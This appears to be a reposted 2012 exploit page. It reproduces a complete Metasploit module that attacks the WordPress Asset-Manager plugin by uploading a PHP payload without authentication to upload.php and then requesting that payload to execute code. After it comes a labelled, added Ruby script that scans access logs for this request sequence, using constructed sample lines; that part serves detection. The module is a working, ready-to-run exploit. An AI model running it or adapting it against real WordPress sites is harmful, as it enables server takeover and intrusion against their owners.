WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, targets a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP files to be uploaded: a user can upload a file to a temporary directory without authentication, which leads to arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin's upload.php reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
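The following detection script is an added example, not part of the original post or of the Metasploit module above: it scans web-server access log lines (combined log format) for the request sequence the module sends, a POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp/. The log lines embedded in it are constructed samples, and the function and constant names are my own.

```ruby
# Added example (not from the original post or the Metasploit module):
# flag the upload-then-execute pattern in combined-format access logs.

UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/([^/]+\.php)\z}
# ip, ident, user, [time], "method path proto", status
LOG_LINE    = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/

# Parse one combined-format line; nil when the line is not in that format.
def parse_line(line)
  m = LOG_LINE.match(line)
  return nil unless m
  { ip: m[1], time: m[2], method: m[3], path: m[4], status: m[5].to_i }
end

# Walk the log in order, remembering which clients hit upload.php, and return
# one finding per suspicious request:
#   high   - GET of temp/*.php answered 200 by a client that posted to upload.php
#   medium - a POST to upload.php, or a GET of temp/*.php with no matching upload
def detect_asset_manager_abuse(lines)
  uploaded = Hash.new(false)
  findings = []
  lines.each do |line|
    req = parse_line(line)
    next unless req
    if req[:method] == 'POST' && req[:path] =~ UPLOAD_PATH
      uploaded[req[:ip]] = true
      findings << { ip: req[:ip], file: nil, severity: 'medium', time: req[:time] }
    elsif req[:method] == 'GET' && (m = TEMP_PHP.match(req[:path])) && req[:status] == 200
      sev = uploaded[req[:ip]] ? 'high' : 'medium'
      findings << { ip: req[:ip], file: m[1], severity: sev, time: req[:time] }
    end
  end
  findings
end

# Constructed sample lines (not from any real system): the first two reproduce
# the module's request sequence, the third is ordinary traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [31/Dec/2012:09:22:33 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "curl/7.27"
  203.0.113.5 - - [31/Dec/2012:09:22:34 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzpw.php HTTP/1.1" 200 0 "-" "curl/7.27"
  198.51.100.7 - - [31/Dec/2012:09:30:01 +0800] "GET /wordpress/wp-content/uploads/2012/12/logo.png HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
LOG

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG.lines).each do |f|
    puts "#{f[:severity].upcase} #{f[:ip]} #{f[:time]} #{f[:file] || 'POST upload.php'}"
  end
end
```

Feed it real log lines with `detect_asset_manager_abuse(File.readlines(path))`; a high finding means a file written by the unauthenticated upload was subsequently served as PHP, so the host should be treated as compromised, not just probed.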